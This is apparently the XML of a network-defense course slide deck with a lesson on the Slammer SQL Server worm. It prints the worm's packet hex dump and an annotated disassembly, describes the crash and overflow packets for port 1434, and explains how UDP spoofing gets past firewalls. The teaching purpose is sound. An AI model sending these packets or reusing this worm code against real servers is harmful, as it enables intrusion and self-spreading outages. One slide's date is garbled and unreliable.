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0"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="397" r:id="rId3"/>
    <p:sldId id="368" r:id="rId4"/>
    <p:sldId id="334" r:id="rId5"/>
    <p:sldId id="335" r:id="rId6"/>
    <p:sldId id="336" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="257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333" r:id="rId29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 autoAdjust="0"/>
    <p:restoredTop sz="81868" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="73" d="100"/>
          <a:sy n="73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3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7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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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non-exclusive, royalty-free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da.org/publications/papers/2003/sapphire/sapphir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sans.org/security-resources/malwarefaq/ms-sql-explo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news/counting-the-cost-of-slammer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Module: Network Defense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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slammer Decoded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8637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‘0x04’ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If first byte set to 0x04 server takes what ever comes after the 0x04, plugs into a buffer using unsafe string copy which can overflow the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional problem is UDP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to spoof the IP address  (pretend to be “internal address”-- this will get around a great deal of firewalls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If set the UDP source port to 53, looks like a response to a DNS query, then again this will bypass a large number of firewalls.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45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‘0x08’ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>If first byte is ‘0x08’ Possible to kill the SQL Server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>When the server dies it has just called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>strtok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>(). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>SQL Server, when it calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>strtok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>() is looking for a colon (:) but as there isn't one then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>strtok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>() returns NULL but whoever coded this part of the server didn't check to see if the function had succeeded or not. They pass the pointer to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>() but, as it's NULL, SQL crashes - the exception isn't handled. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>If a two byte packet, \x08\x3A – (the 0x3A is a colon), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>strtok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>() succeeds and a pointer is returned but SQL still crashes, as there is nothing after the colon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> crashes - another failure to check if things have worked out okay. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>If send a 3-byte packet: \x08\x3A\x31 - SQL survives. This looks too close to being a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>host:port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> kind of thing so we plug in an overly long string, tack on a :22 at the end and fire off the packet. This time there's a heap overflow - one that allows an attacker to gain complete control over the server. The same caveats about UDP and firewalls, of course, apply here too.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3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and Buffer Overflow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25431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089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Slammer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4500 0194 cf09 0000 8011 e630 c0a8 0164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c0a8 016a 049f 059a 0180 ac8d 0401 0101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0101 0101 0101 0101 0101 0101 0101 0101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0101 0101 0101 0101 0101 0101 01dc c9b0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42eb 0e01 0101 0101 0101 70ae 4201 70ae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4290 9090 9090 9090 9068 dcc9 b042 b801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0101 0131 c9b1 1850 e2fd 3501 0101 0550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89e5 5168 2e64 6c6c 6865 6c33 3268 6b65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726e 5168 6f75 6e74 6869 636b 4368 4765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7454 66b9 6c6c 5168 3332 2e64 6877 7332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5f66 b965 7451 6873 6f63 6b66 b974 6f51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6873 656e 64be 1810 ae42 8d45 d450 ff16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508d 45e0 508d 45f0 50ff 1650 be10 10ae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428b 1e8b 033d 558b ec51 7405 be1c 10ae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42ff 16ff d031 c951 5150 81f1 0301 049b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81f1 0101 0101 518d 45cc 508b 45c0 50ff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166a 116a 026a 02ff d050 8d45 c450 8b45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c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45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b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829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c28d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76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buffer overflow is successful (first byte ‘0x04’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Puts 42B0C9DC on the stack as a return address. This address is in sqlsort.dll and contains the command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, which jumps BACK to the attack code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After overflow, before jumping to code, payload is corrupted, so code rebuilds its buffer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cl, 18h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FIXUP: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; [EBP-8 to EBP-60h]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loop FIXUP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5010101h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push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; [EBP-64h]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31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[Worm Body]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42 B0 C9 DC 01 01 01 01 				[EBP+58h]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[EBP+50h]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[EBP+40h]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[EBP+30h]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[EBP+20h]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01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 	[EBP+10h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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01 01 01 01 01 01 01 01 01 01 01 01 04 00 00 00 	[EBP-0]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6C 6C 64 2E 32 33 6C 65 6E 72 65 6B	[EBP-10h] ;'kernel32.dll'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00 00 74 6E 75 6F 43 6B 63 69 54 74 65 47 	[EBP-20h] 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6C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64 2E 32 33 5F 32 73 77 		[EBP-2Ch]; 'ws2_32.dll'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74 65 6B 63 6F 73 				[EBP-34h] ; 'socket'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00 00 6F 74 64 6E 65 73 				[EBP-3Ch];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[Base address of ws2_32.dll] 			[EBP-40h] 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00 00 00 00 00 00 00 00 				[EBP-48h] ; sin_zero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[Pseudo-Random seed] 				[EBP-4Ch];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sin_addr.s_addr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9A 05 00 02 				[EBP-50h] ; sin_port, sin_family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[UDP socket descriptor] [EBP-54h]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1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then "normalized" for the exploit to continue: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EBP=ESP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, a series of strings and terminating nulls are pushed onto the stack. This is common practice in simple exploits that do not require a lot of data to operate. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register is used to store nulls.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[EBP4]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08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cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set up a stack frame to store the following strings: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6C6C642Eh 	; [EBP-8]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32336C65h 	; [EBP-0Ch]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6E72656Bh 	; [EBP-10h] Push string kernel32.dll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[EBP-14h]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746E756Fh	; [EBP-18h]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436B6369h 	; [EBP-1Ch]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54746547h 	; [EBP-20h]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6C6Ch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[EBP-24h]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642E3233h 	; [EBP-28h] Push string ws2_32.dll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5F327377h 	; [EBP-2Ch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7465h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[EBP-30h]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6B636F73h 	; [EBP-34h] Push string socket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6F74h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[EBP-38h]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646E6573h 	; [EBP-3Ch] Push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57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Slammer Worm Insides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locates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> from the Import Address Table (IAT) of the sqlsort.dll library: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42AE1018h ; sqlsort.dll-&gt;IAT entry for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	  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LoadLibrary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loads the ws_32.dll library into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and saves the resulting handle for a later </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetProcAddress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[ebp-2Ch]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	      ; [EBP-40h]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ESP=EBP-3Ch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      ; [EBP-40h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>pushes a string pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetTickCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) onto stack. This will be used as an argument to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> call after the next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> call: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[ebp-20h]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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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21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then obtains a handle to the kernel32.dll library via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> function referenced in ESI. This is done in the same way as the previous loading of ws_32.dll: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[ebp-10h] ; address of string "kernel32.dll"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; Procedure exit: ESP=EBP-44h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; [EBP-48h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>attempts to locate the entry for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetProcAddress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42AE1010h ; Move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sqlsort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:[IAT]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(function entry point)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	; Move 4 instruction bytes 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85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E79-84CD-4BD4-8191-64CD17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D7D9-AFF5-4F1C-A116-5D460DCC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Description:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The intent of this Knowledge Unit is to provide students with an understanding of network threats and defensive techniques. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Topics:​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson 1: Network Attacks and Threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson 2: Firewalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Netfilter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson 4: Intrusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Option Lesson: Slammer Worm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ECBD-F96D-47DA-9A6D-248B240A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52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attempts to fingerprint the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> API, and will fall back to the other known base address if this fails;  due to slight discrepancies in the sqlsort.dll in services packs 1 and 2 of MSDE 2000. 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51EC8B55h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short VALID_GP ;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(kernel32_base,GetTickCount)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="80010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42AE101Ch ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>This point is only reached if the previous test failed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>next assignment will assign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> the sqlsort.dll-&gt;IAT entry for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and calls it. The API receives its two parameters from the top of the stack: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FOUND_IT:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="85725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; [ESP=EBP-40h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2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(kernel32_base,GetTickCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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45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calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetTickCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> via the return value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> call, and adds eight bytes to its stack frame for later storage needs:.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GetTickCount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ESP=EBP-40h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[EBP-48h]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95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worm generates two permanent members of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sockaddr_in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> structure. ECX=9A050002, which represents the first two members of the structure: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short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sin_zero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[8];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The first member is set to 2 (AF_INET), and the second is set to the network-order representation of 1434 (the port of the SQL resolution service). This 4-byte set is then saved to the stack frame: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9B040103h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="9144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1010101h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[EBP-50h]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20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worm then locates the 'socket' API call via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pointer stored in the ESI register. EBP-34h stores the address of the string literal "socket", while EBP-40h stores the base address of the ws2_32.dll library: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[EBP-54h]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[EBP-58h]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ESP=EBP-50h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05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worm then creates a UDP socket for use in propagation. The socket is a User Datagram Protocol socket, and the function address is pulled from the return value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. The worm then saves the socket descriptor to its stack frame:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2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push 11h 		; [EBP-54h] IPPROTO_UDP - User Datagram Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" inden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push 2 		; [EBP-58h] SOCK_DGRAM - Datagram socket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2 		; [EBP-5Ch] AF_INET - Internet address family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Procedure exit: ESP=EBP-50h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[EBP-54h]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[ebp-3Ch]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[EBP-58h]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[ebp-40h]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; [EBP-5Ch]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	; Procedure exit: ESP=EBP-54h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worm XORs the EBX register with 0xFFD9613C. The OR instruction was most likely intended to be an XOR. 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17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Propagation: generates a random number based on the seed stored at EBP-4Ch, and then replacing it with the value in EAX at the end of the procedure:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PRND: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[ebp-4Ch] 	; EAX=Random seed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*2] 	; ECX=EAX*4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EDX=ECX*4+EAX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4 		; EDX=EDX&lt;&lt;4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EDX+=EAX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shl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8 		; EDX=EDX&lt;&lt;8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EDX-=EAX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eax+edx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*4] 	; EAX+=EDX*4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EAX+=EBX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="8001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[ebp-4Ch],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; Replace old seed w/ new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1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sendto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> called: 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WINSOCK_API_LINKAGE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WSAAPI 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SOCKET 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char FAR *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flags,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FAR * to,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/>
              <a:t>The parameters are passed as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s = EBP-54h: This is the socket descriptor returned by the prior call to socket.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 = [EBP+3]: This is the buffer that was sent to the SQL server to cause the overflow.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 = 376: This tells the function that the body of the packet is 376 bytes in length.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>flags = 0: This specifies that no special behavior is to be applied to the outbound packet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to = EBP-50h: This is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sockaddr_in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> structure mentioned earlier. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sin_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> member of the structure is set to the number returned from PRND.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tolen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 10h: This tells the function that the structure is exactly 16 bytes in length.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5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Insides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10h 		; [EBP-58h]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[ebp-50h]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[EBP-5Ch]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=Target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[EBP-60h]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=Send flags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cx, 178h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[EBP-64h]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=Packet length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[ebp+3]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[EBP-68h]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=Exploit address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[ebp-54h]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[EBP-6Ch]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=socket descriptor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; Procedure exit: ESP=EBP-54h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The worm then continues replication by jumping back into the pseudo-random number generator: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short PRND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68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describe the basic attack technique used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the Sapphire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Slammer worm.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D30A-1B90-488C-BB6A-78C1FD5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Sapphire/Slammer Worm Attribution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9159-135B-4E15-BF78-FF37FEE5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“The Spread of the Sapphire/Slammer Worm”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.caida.org/publications/papers/2003/sapphire/sapphire.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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See also:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Malware FAQ: MS-SQL Slammer”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.sans.org/security-resources/malwarefaq/ms-sql-exploit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1177-A86A-46CE-834E-10A1A9E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5EFB-8988-4BBE-B77B-7547B9E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Sapphire/Slammer Worm was the fastest computer worm in history. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>January 235, 203</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As it began spreading throughout the Internet, it doubled in size every 8.5 seconds. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It infected more than 90 percent of vulnerable hosts within 10 minutes.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infected more than 75,000 hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How did it work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploited a buffer overflow vulnerability in computers on the Internet running Microsoft's SQL Server or MSDE 2000 (Microsoft SQL Server Desktop Engine). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patch was released almost 6 months earlier.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8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9E4D-324D-402F-910C-B992E197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FB48-691E-45F5-AA10-E6B84A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payload was only 375 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Did not have malicious content, just spread a copy of itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many Bank of America ATMs would not work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Global internet slowdown</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interfered with 911 calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many cancelled flights</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Over $1Billion in US. Dollars of damage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>one estimate lost productivity in first 5 days worldwide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>one estimate of cost of cleanup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cnet.com/news/counting-the-cost-of-slammer/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1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Slammer Worm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Based on analysis of Matthew Murphy and Riley </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hassell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eeye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Initial vulnerability reported David Litchfield</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compromises SQL Server/MSDE 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When server is infected, worm sets up a stack frame with information needed for propagation,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GetTickCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> API (for random seed generation)and other WinSock APIs. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LoadLibraryA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetProcAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> APIs by searching sqlsort.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is a single packet infection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MS SQL Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Port 1434 is assigned to MS SQL Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tests of this undocumented interface showed that if single byte sent ‘0x02’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ServerName:SERVER_NAME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InstanceName:MSSQLSERVER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IsClustered:No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Version:8.00.194 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>np:\\SERVER_NAME\pipe\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\query </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via:SERVER_NAME,0:1433 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Version number wrong, other commands show 8.00.608 for SP2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If SQL server is “hidden” it listens to port 2433, but this port is still active</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tests found that not all inputs handled, testing values ‘0x00’ to ‘0xFF’ ‘0x08’ server died</a:t>
            </a:r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200" dirty="0"/>
